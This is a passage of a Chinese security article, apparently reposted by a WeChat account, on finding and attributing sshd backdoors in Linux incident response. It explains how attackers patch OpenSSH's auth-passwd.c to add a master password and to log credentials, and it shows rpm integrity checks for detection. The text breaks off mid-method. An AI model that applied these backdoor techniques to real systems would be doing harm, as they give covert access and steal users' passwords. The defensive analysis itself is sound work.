技术干货 | sshd 后门分析与团伙归类报告 安全新闻

技术干货 | sshd 后门分析与团伙归类报告

本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安世加的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!欢迎各位添加微信号:asj-jacky加入安世加 交流群 和大佬们一起交流安全技术概要在很多 Linux 平台的应急响应过程中,发现很多系统中存在 sshd 后门,虽然 sshd 后门已经存在 10 余年,但是并没有公开资料讲解如何分析,因此多数安全人员不能发现 sshd 后门,更不清楚如何分析,从而导致系统中的 sshd 后门长期存在,sshd 后门常用功能是记录所有登录本主机的账号密码,以及增加万能密码,也有的会将账号密码传输到攻击者得到服务器中,攻击者可以利用后门或者获得后的密码直接进入系统,如入无人之境,长期的对目标系统进行侵害,属于 Linux APT 攻击技术,本篇文章将会讲解两种分析 sshd 后门的方法以及 4 种 sshd 后门对应的黑客团伙,给大家提供一些分析思路,其余的 ssh wrapper 后门、ssh 软链接后门等相对简单,就不在文中提及,感兴趣的话可以自己进行分析。sshd 万能密码后门实现原理sshd 程序是 openssh-server 软件包的其中一个可执行程序,属于服务端程序,默认开放 22 端口,对外提供 ssh 服务。由于 openssh-server 是开源程序,任何人都能够对其源码进行更改,重新编译,为攻击者植入恶意代码块提供了技术可能,所以除了sshd程序会被攻击者篡改之外,openssh-client 软件包中的 ssh 命令也经常被攻击者篡改,用来窃取目标机器连接其他外部机器的账号密码等信息。1. 万能密码认证功能示例以下是网络中的一个 openssh-5.9p1 的一个后门代码,在密码认证文件 auth-passwd.c 中的 auth_password 函数内添加一个判断条件,如果密码等于 SECRETPW(这个数值可以自己配置),则返回  secret_ok=1 表示密码认证成功,就不进行接下去的密码判断流程,相当于添加了一个万能密码。2. 登录账户密码记录功能示例在和上方相同的文件 auth-passwd.c 中的 auth_password 函数中添加如下的代码,指的是如果系统密码认证成功,则将用户名密码以特定格式加入到自定义的 ILOG 文件中。sshd 万能密码后门快速检测方法sshd 万能密码后门的检查方法主要有两种,静态检测和动态检测,静态检测包含 sshd 程序的完整性校验,以及可执行文件的特征检测,可以使用 yara 规则对已知的 sshd 后门程序的特征进行搜集,然后扫描系统中的 sshd 可执行文件,对被篡改的 sshd 程序逆向分析,动态检测相对麻烦些,而且需要一些 Linux 系统调用相关知识,适用于 sshd 加密加壳等无法直接逆向分析的情况。1. sshd 程序完整性检查使用系统中自带的 rpm 程序,或者 dpkg 程序对系统中用软件包安装的 sshd 程序进行完整性校验,将初始化安装时的 md5 与目前的 md5 进行对比,如果发生变化则说明文件被篡改,则进行下面的分析。centos 系列示例 rpm -Vf /usr/sbin/sshdS.5....T.    /usr/sbin/sshdS 关键字代表文件大小发生了变化5 关键字代表文件的 md5 值发生了变化T 代表文件时间发生了变化2. Linux 下静态快速识别获得 sshd strings 之后的内容,写入到 test 文件中,使用正则查找...
阅读全文